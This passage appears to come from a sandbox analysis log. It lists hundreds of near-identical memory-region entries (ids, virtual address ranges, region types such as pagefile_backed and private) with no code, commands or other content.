pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6043 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6044 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6045 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6046 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6047 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6048 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6049 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6050 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6051 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6052 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6053 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6054 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6055 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6056 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6057 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6058 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6059 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6060 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6061 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6062 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6063 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6064 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6065 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6066 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6067 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6068 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6069 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6070 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6071 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6072 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6073 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6074 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6075 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6076 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6077 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6078 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6079 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6080 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6081 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6082 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6083 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6084 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6085 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6086 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6087 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6088 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6089 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6090 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6091 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6092 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6093 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6094 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6095 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6096 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 6097 start_va = 0x540000 end_va = 0x542fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6098 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6099 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6100 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6101 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6102 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6103 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6104 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6105 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6106 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6107 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6108 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6109 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6110 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6111 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6112 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6113 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6114 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6115 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6116 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6117 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6118 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6119 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6120 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6121 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6122 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6123 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6124 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6125 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6126 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6127 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6128 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6129 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6130 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6131 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6132 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6133 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6134 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6135 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6136 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6137 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6138 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6139 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6140 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6141 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6142 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6143 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6144 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6145 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6146 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6147 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6148 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6149 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6150 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6151 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6152 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6153 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6154 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6155 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6156 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6157 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6158 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6159 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6160 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6161 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6162 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6163 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6164 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6165 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6166 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6167 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6168 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6169 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6170 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6171 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6172 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6173 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6174 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6175 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6176 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6177 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6178 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6179 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6180 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6181 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6182 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6183 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6184 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6185 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6186 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6187 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6188 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6189 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6190 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6191 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6192 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6193 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6194 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6195 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6196 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6197 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6198 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6199 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6200 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6201 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6202 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6203 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6204 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6205 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6206 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6207 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6208 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6209 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6210 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6211 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6212 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6213 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6214 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6215 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6216 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6217 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6218 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6219 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6220 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6221 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6222 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6223 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6224 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6225 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6226 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6227 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6228 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6229 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 6230 start_va = 0x570000 end_va = 0x57ffff monitored = 1 